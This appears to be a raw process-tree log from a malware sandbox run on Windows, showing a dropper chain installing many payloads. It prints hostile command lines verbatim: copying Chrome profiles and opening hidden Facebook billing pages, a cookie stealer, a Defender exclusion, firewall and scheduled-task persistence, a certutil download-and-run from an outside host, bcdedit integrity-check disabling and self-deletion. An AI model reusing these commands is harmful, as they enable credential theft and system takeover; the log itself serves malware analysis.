C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵PID:7976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵PID:7576
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵PID:7256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2172 /prefetch:825⤵PID:4940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1676 /prefetch:825⤵PID:6272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:225⤵PID:6308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:125⤵PID:10336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:125⤵PID:10324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:125⤵PID:10368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3068 /prefetch:125⤵PID:10360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:125⤵PID:10436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,906115645815447168,4261103876022020937,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:125⤵PID:10536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jev4c2gx1nf\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\jev4c2gx1nf\chashepro3.exe" /VERYSILENT23⤵PID:8068
-
C:\Users\Admin\AppData\Local\Temp\is-QKUJ9.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-QKUJ9.tmp\chashepro3.tmp" /SL5="$802C0,1478410,58368,C:\Users\Admin\AppData\Local\Temp\jev4c2gx1nf\chashepro3.exe" /VERYSILENT24⤵PID:7860
-
-
-
C:\Users\Admin\AppData\Local\Temp\h3axto2vspk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\h3axto2vspk\Setup3310.exe" /Verysilent /subid=57723⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\is-QGSAK.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-QGSAK.tmp\Setup3310.tmp" /SL5="$17050A,802346,56832,C:\Users\Admin\AppData\Local\Temp\h3axto2vspk\Setup3310.exe" /Verysilent /subid=57724⤵PID:10576
-
C:\Users\Admin\AppData\Local\Temp\is-M9BPM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M9BPM.tmp\Setup.exe" /Verysilent25⤵PID:13000
-
C:\Users\Admin\AppData\Local\Temp\is-SLUKT.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SLUKT.tmp\Setup.tmp" /SL5="$20B14,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-M9BPM.tmp\Setup.exe" /Verysilent26⤵PID:12208
-
C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Messure.exe" /Verysilent27⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\is-APKS7.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-APKS7.tmp\Messure.tmp" /SL5="$7068C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Messure.exe" /Verysilent28⤵PID:7988
-
C:\Users\Admin\AppData\Local\Temp\is-R3SOD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R3SOD.tmp\Setup.exe" /VERYSILENT29⤵PID:11488
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\PictureLAb.exe" /Verysilent27⤵PID:8448
-
C:\Users\Admin\AppData\Local\Temp\is-K7EQR.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-K7EQR.tmp\PictureLAb.tmp" /SL5="$8068C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\PictureLAb.exe" /Verysilent28⤵PID:14832
-
C:\Users\Admin\AppData\Local\Temp\is-EA41H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EA41H.tmp\Setup.exe" /VERYSILENT29⤵PID:14108
-
C:\Users\Admin\AppData\Local\Temp\is-576OI.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-576OI.tmp\Setup.tmp" /SL5="$60988,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-EA41H.tmp\Setup.exe" /VERYSILENT30⤵PID:14404
-
C:\Users\Admin\AppData\Local\Temp\is-Q3DDQ.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-Q3DDQ.tmp\def.exe" /S /UID=lab21431⤵PID:10456
-
C:\Users\Admin\AppData\Local\Temp\b1-00576-b1a-e5995-2cfb6fbf4fefe\Sovowutoge.exe"C:\Users\Admin\AppData\Local\Temp\b1-00576-b1a-e5995-2cfb6fbf4fefe\Sovowutoge.exe"32⤵PID:14448
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gpfun0pm.5tg\md7_7dfj.exe & exit33⤵PID:13072
-
C:\Users\Admin\AppData\Local\Temp\gpfun0pm.5tg\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\gpfun0pm.5tg\md7_7dfj.exe34⤵PID:12536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ai30kkbm.xqu\askinstall18.exe & exit33⤵PID:7456
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Delta.exe" /Verysilent27⤵PID:6508
-
C:\Users\Admin\AppData\Local\Temp\is-1AUQC.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-1AUQC.tmp\Delta.tmp" /SL5="$50B8E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-CNM10.tmp\Delta.exe" /Verysilent28⤵PID:13360
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uperdx2syut\wrepiuvp5w3.exe"C:\Users\Admin\AppData\Local\Temp\uperdx2syut\wrepiuvp5w3.exe" /ustwo INSTALL23⤵PID:13348
-
-
C:\Users\Admin\AppData\Local\Temp\01yy430jmar\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\01yy430jmar\askinstall24.exe"23⤵PID:8512
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵PID:14952
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
PID:12436
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵PID:6052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵PID:15004
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵PID:13756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1452,16012961976689620770,7956683281350075057,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:225⤵PID:13712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,16012961976689620770,7956683281350075057,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1692 /prefetch:825⤵PID:11204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\akg2y2eu2qr\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\akg2y2eu2qr\chashepro3.exe" /VERYSILENT23⤵PID:10184
-
C:\Users\Admin\AppData\Local\Temp\is-28ID6.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-28ID6.tmp\chashepro3.tmp" /SL5="$5083C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\akg2y2eu2qr\chashepro3.exe" /VERYSILENT24⤵PID:2408
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Delta.exe" /Verysilent12⤵PID:6352
-
C:\Users\Admin\AppData\Local\Temp\is-1MMQM.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-1MMQM.tmp\Delta.tmp" /SL5="$4039C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Delta.exe" /Verysilent13⤵PID:516
-
C:\Users\Admin\AppData\Local\Temp\is-4T9JH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4T9JH.tmp\Setup.exe" /VERYSILENT14⤵PID:6812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-4T9JH.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵
- Blocklisted process makes network request
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
PID:6800 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
PID:6940
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
PID:4272
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\zznote.exe" /Verysilent12⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\is-ABPTK.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-ABPTK.tmp\zznote.tmp" /SL5="$5039C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\zznote.exe" /Verysilent13⤵PID:3740
-
C:\Users\Admin\AppData\Local\Temp\is-INA7P.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-INA7P.tmp\jg4_4jaa.exe" /silent14⤵PID:6028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\hjjgaa.exe" /Verysilent12⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:6396
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abz1zpnfd2k\vpn.exe"C:\Users\Admin\AppData\Local\Temp\abz1zpnfd2k\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\lvsgkxmu32j\tbf5e3oskok.exe"C:\Users\Admin\AppData\Local\Temp\lvsgkxmu32j\tbf5e3oskok.exe" 57a764d042bf88⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:704 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\4DY9D8C0UK\H24OL7I1T.exe" 57a764d042bf8 & exit9⤵PID:5988
-
C:\Program Files\4DY9D8C0UK\H24OL7I1T.exe"C:\Program Files\4DY9D8C0UK\H24OL7I1T.exe" 57a764d042bf810⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:1340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\s4vwg0thezh\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\s4vwg0thezh\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1008 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:5196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:5368
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mno5qur0nrc\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\mno5qur0nrc\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\5qqx5anlpvp\igfzl2wj0pz.exe"C:\Users\Admin\AppData\Local\Temp\5qqx5anlpvp\igfzl2wj0pz.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:3444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6529⤵
- Drops file in Windows directory
- Program crash
PID:5908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6649⤵
- Program crash
PID:6068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6689⤵
- Program crash
PID:5380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 6849⤵
- Program crash
PID:5276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 8849⤵
- Program crash
PID:4820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 9329⤵
- Program crash
PID:5984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 11809⤵
- Program crash
PID:5312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 12089⤵
- Program crash
PID:5596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 13129⤵
- Program crash
PID:6120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 10969⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5504
-
-
-
C:\Users\Admin\AppData\Local\Temp\uiyv1rq20iq\app.exe"C:\Users\Admin\AppData\Local\Temp\uiyv1rq20iq\app.exe" /8-238⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Silent-Rain"9⤵PID:5284
-
-
C:\Program Files (x86)\Silent-Rain\7za.exe"C:\Program Files (x86)\Silent-Rain\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2592
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Silent-Rain\app.exe" -map "C:\Program Files (x86)\Silent-Rain\WinmonProcessMonitor.sys""9⤵PID:5668
-
C:\Program Files (x86)\Silent-Rain\app.exe"C:\Program Files (x86)\Silent-Rain\app.exe" -map "C:\Program Files (x86)\Silent-Rain\WinmonProcessMonitor.sys"10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:5168
-
-
-
C:\Program Files (x86)\Silent-Rain\7za.exe"C:\Program Files (x86)\Silent-Rain\7za.exe" e -p154.61.71.51 winamp.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6204
-
-
C:\Program Files (x86)\Silent-Rain\app.exe"C:\Program Files (x86)\Silent-Rain\app.exe" /8-239⤵PID:6612
-
C:\Program Files (x86)\Silent-Rain\app.exe"C:\Program Files (x86)\Silent-Rain\app.exe" /8-2310⤵PID:5688
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:5220
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵PID:6604
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2311⤵PID:4248
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
PID:6112
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F12⤵
- Creates scheduled task(s)
PID:3844
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"12⤵PID:1336
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER13⤵
- Modifies boot configuration data using bcdedit
PID:1500
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:7376
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:8120
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows13⤵
- Modifies boot configuration data using bcdedit
PID:7688
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe13⤵
- Modifies boot configuration data using bcdedit
PID:7812 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7004
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe13⤵
- Modifies boot configuration data using bcdedit
PID:7932
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 013⤵
- Modifies boot configuration data using bcdedit
PID:1500
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn13⤵
- Modifies boot configuration data using bcdedit
PID:7432
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 113⤵
- Modifies boot configuration data using bcdedit
PID:7120
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}13⤵
- Modifies boot configuration data using bcdedit
PID:7612
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast13⤵
- Modifies boot configuration data using bcdedit
PID:7752
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 013⤵
- Modifies boot configuration data using bcdedit
PID:7800
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}13⤵
- Modifies boot configuration data using bcdedit
PID:640
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy13⤵
- Modifies boot configuration data using bcdedit
PID:7240
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v12⤵
- Modifies boot configuration data using bcdedit
PID:7808
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe12⤵PID:6820
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"12⤵PID:7992
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)13⤵PID:7264
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)14⤵PID:5772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe12⤵PID:5920
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe12⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"13⤵PID:8772
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe12⤵PID:4920
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"13⤵PID:8888
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=bd06205b-5373-4bbd-99b5-d114b246947d&browser=chrome14⤵PID:9180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2015⤵PID:9188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 /prefetch:815⤵PID:8516
-
-
